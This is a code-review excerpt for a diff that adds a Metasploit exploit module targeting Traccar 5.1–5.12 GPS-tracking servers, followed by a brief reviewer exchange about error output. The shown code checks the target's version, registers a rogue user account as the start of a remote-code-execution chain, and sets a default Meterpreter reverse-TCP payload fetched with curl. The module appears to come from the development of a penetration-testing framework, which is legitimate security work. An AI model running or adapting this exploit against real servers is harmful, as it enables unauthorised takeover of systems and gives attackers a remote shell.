modules/exploits/linux/http/traccar_rce_upload.rb

```diff
@@ -0,0 +1,262 @@
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'CURL',
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
+
+              },
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8082),
+        OptString.new('USERNAME', [true, 'Username to be used when creating a new user', Faker::Internet.username]),
+        OptString.new('PASSWORD', [true, 'Password for the new user', Rex::Text.rand_text_alphanumeric(16)]),
+        OptString.new('EMAIL', [true, 'E-mail for the new user', Faker::Internet.email]),
+        OptString.new('TARGETURI', [ true, 'The URI for the Traccar web interface', '/'])
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/server')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    unless res && res.code == 200
+      return CheckCode::Unknown
+    end
+
+    data = res.get_json_document
+    version = data['version']
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      vprint_status('Version retrieved: ' + version)
+    end
+
+    unless Rex::Version.new(version).between?(Rex::Version.new('5.1'), Rex::Version.new('5.12'))
+      return CheckCode::Safe
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Registering new user...')
+    body = {
+      name: datastore['USERNAME'],
+      email: datastore['EMAIL'],
+      password: datastore['PASSWORD'],
+      totpKey: nil
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/users'),
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    # not quite necessary to check for this, since we exit all cases that are not 200 below, but this is a common error
+    # to run into when this module is executed more than once without updating the provided email address
+    if res.code == 400 && res.to_s.include?('Unique index or primary key violation')
+      fail_with(Failure::UnexpectedReply, 'Error: The same E-mail already exists on the system: ' + res.to_s)
```

Comment:
I like warning the user about the 400 and printing the response but think the response probably only needs be printed when `verbose` has been set to `true` as we already know theres been a `Unique index or primary key violation.`
```suggestion
      vprint_status(res.to_s)
      fail_with(Failure::UnexpectedReply, 'Error: The same E-mail already exists on the system')
```

Reply:
Yes, makes sense.